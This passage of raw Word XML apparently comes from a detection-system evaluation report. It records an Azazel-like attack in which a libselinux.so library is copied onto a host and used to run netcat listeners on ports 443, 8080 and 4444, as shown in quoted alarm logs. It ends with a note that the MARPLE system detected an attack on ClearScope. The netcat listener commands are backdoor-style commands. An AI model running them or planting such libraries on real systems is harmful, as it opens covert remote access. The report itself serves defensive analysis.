    <w:p w14:paraId="1099BFC7" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="000112FB">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:i/>
            <w:color w:val="313131"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:u w:val="single" w:color="313131"/>
          </w:rPr>
          <w:t>libselinux.so</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> file has been scp'd into the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755EED1D" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB57BD" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F21BE36" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>multiple nc -k -l program has executed using it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8ADB36" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160865EF" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B3B47F5" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>19-05-17 09:13:35.22: Alarm: FileExec: Object 18792148 (/lib/libselinux.so) Subject 7067130 pid=7514 nc -k -l 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C445C72" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B3E1B" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAA7098" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>19-05-17 09:13:43.36: Alarm: FileExec: Object 18792148 (/lib/libselinux.so) Subject 7067418 pid=7613 nc -k -l 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE4870" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011DECFF" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7419B339" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>19-05-17 09:26:18.34: Alarm: FileExec: Object 18792148 (/lib/libselinux.so) Subject 7072562 pid=9553 nc -k -l 4444  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FD8194" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060D11F" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D43819B" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>19-05-17 09:27:06.63: Alarm: FileExec: Object 18792148 (/lib/libselinux.so) Subject 7073842 pid=9980 env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CFEE01" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EA55E8" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68EE924D" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>It has also been loaded to the environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F78E7" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>9:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E0319" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="638FA5C4" w14:textId="5A78281F" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="313131"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Has the similar attack pattern as the Azazel attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688FE3C7" w14:textId="77777777" w:rsidR="00B87C44" w:rsidRDefault="00821808" w:rsidP="000E4F27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F24630E" wp14:editId="7519CBCD">
            <wp:extent cx="6169660" cy="12623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6-27 at 10.25.55 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6169660" cy="1262380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521CE94" w14:textId="79AC60E5" w:rsidR="00821808" w:rsidRDefault="00B87C44" w:rsidP="00B87C44">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MARPLE-TRACE attack setup of Azazel on host 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53CDC6" w14:textId="77777777" w:rsidR="000E4F27" w:rsidRPr="000E4F27" w:rsidRDefault="000E4F27" w:rsidP="000E4F27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2B3376" w14:textId="77777777" w:rsidR="00B87C44" w:rsidRDefault="00821808" w:rsidP="000E4F27">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797996EC" wp14:editId="7291ABA2">
            <wp:extent cx="6170579" cy="150658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6-27 at 10.25.44 AM.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6215651" cy="1517588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F3CE6" w14:textId="47372B91" w:rsidR="00821808" w:rsidRPr="000112FB" w:rsidRDefault="00B87C44" w:rsidP="00B87C44">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A62E26">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00FE4530">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B87C44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>MARPLE-TRACE attack setup of Azazel on host 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA23242" w14:textId="2C6ED190" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="00FE6381">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255B0785" w14:textId="36012BF9" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00141067" w:rsidP="000E52B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="_Toc12600164"/>
      <w:r>
        <w:t xml:space="preserve">TA1 </w:t>
      </w:r>
      <w:r w:rsidR="00FE6381" w:rsidRPr="000112FB">
        <w:t>ClearScope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="283"/>
    </w:p>
    <w:p w14:paraId="558BE32F" w14:textId="77777777" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="00821808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>On 5/15 MARPLE successfully identified, in real time, the attack against ClearScope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E15487" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="000112FB" w:rsidRDefault="007508CA" w:rsidP="00821808">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F268FB" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
